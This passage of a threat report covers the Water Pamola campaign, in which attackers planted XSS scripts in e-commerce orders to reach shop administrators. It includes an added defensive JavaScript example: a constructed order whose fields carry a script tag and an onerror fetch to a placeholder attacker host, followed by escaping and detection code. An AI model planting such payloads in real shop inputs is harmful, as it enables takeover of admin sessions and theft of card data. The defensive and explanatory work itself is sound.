Water Pamola Campaign Targeted E-Commerce Sites in Japan, Australia, and Europe via Malicious Orders

The screenshot above shows a post on a forum, which Google Translate renders as: "Problem: there is an order that seems to be a mischievous order. The following characters are included in the address and company name."


The script embedded in the order connects to Water Pamola's server and downloads additional payloads. Taken together, this led us to believe that Water Pamola places orders carrying this XSS script across many targeted online shops. If a shop is vulnerable to the XSS attack, the payloads are loaded when the victim (i.e., an administrator at the targeted merchant) opens the order within the shop's management panel.
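The mechanism described above, as an added example that is not part of the original write-up: an order whose free-text fields (company name, address) carry markup is rendered unescaped into the merchant's management panel, so the markup executes in the administrator's browser. The order record and the `attacker.invalid` URLs are constructed placeholders, not indicators from the campaign; `renderOrderUnsafe`, `renderOrderSafe` and `findSuspiciousFields` are hypothetical names chosen for this illustration.

```javascript
// Added example (not from the Trend Micro write-up): how a payload placed
// in an order's free-text fields reaches an administrator's browser, and
// how output escaping stops it. The order below is constructed; the
// attacker.invalid URLs are placeholders, not real indicators.

const CONSTRUCTED_ORDER = {
  id: 'ORD-0001',
  company: 'Example Co.<script src="https://attacker.invalid/p.js"></script>',
  address: '1-2-3 Example St<img src=x onerror="fetch(\'https://attacker.invalid/c\')">',
  total: 1200,
};

// Vulnerable renderer: interpolates buyer-supplied fields straight into
// HTML. This is the pattern the campaign relies on: the script tag in the
// company field is emitted verbatim and runs when the admin views the order.
function renderOrderUnsafe(order) {
  return `<tr><td>${order.id}</td><td>${order.company}</td>` +
         `<td>${order.address}</td><td>${order.total}</td></tr>`;
}

// Hardened renderer: HTML-escape every untrusted field before it reaches
// the page, so '<script>' becomes inert text rather than an element.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
  })[c]);
}

function renderOrderSafe(order) {
  return `<tr><td>${escapeHtml(order.id)}</td><td>${escapeHtml(order.company)}</td>` +
         `<td>${escapeHtml(order.address)}</td><td>${escapeHtml(order.total)}</td></tr>`;
}

// Cheap server-side triage for hunting orders like the one the forum
// poster described: flag buyer-supplied fields containing markup that has
// no business in a name or address. Not a substitute for output escaping.
const SUSPICIOUS = /<\s*(script|img|svg|iframe)\b|on\w+\s*=|javascript:/i;

function findSuspiciousFields(order) {
  return Object.entries(order)
    .filter(([k, v]) => typeof v === 'string' && k !== 'id' && SUSPICIOUS.test(v))
    .map(([k]) => k);
}

// True when a rendered fragment still contains markup the browser would execute.
function containsActiveMarkup(html) {
  return /<script\b|<img\b[^>]*\bonerror/i.test(html);
}

console.log('unsafe render executes payload:', containsActiveMarkup(renderOrderUnsafe(CONSTRUCTED_ORDER)));
console.log('safe render executes payload:  ', containsActiveMarkup(renderOrderSafe(CONSTRUCTED_ORDER)));
console.log('flagged fields:', findSuspiciousFields(CONSTRUCTED_ORDER));
```

The triage regex is deliberately narrow and will miss obfuscated payloads; the durable fix is the escaping in `renderOrderSafe` (or a templating engine that escapes by default) applied everywhere order data is displayed, combined with a Content Security Policy on the admin panel that blocks script loads from untrusted origins.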


We have collected many of the attack scripts they delivered to different targets. The malicious behaviors performed by these scripts include page grabbing, credential phishing, web shell infection, and malware delivery.


This campaign appears to be financially motivated. In at least one instance, a site that Water Pamola attacked later disclosed that it had suffered a data breach: its server was illegally accessed, and personal information, including names, credit card numbers, card expiration dates, and credit card security codes, was potentially leaked. This breach might be associated with Water Pamola, and it hints that the campaign's overall goal is to steal credit card data (similar to Magecart campaigns).


Analysis of the XSS attack


As previously mentioned, Water Pamola sent online shopping orders appended with a malicious XSS script to attack e-commerce administrators.


It’s worth mentioning that they are not targeting a specific e-commerce framework, but e-commerce systems in general. If the ..
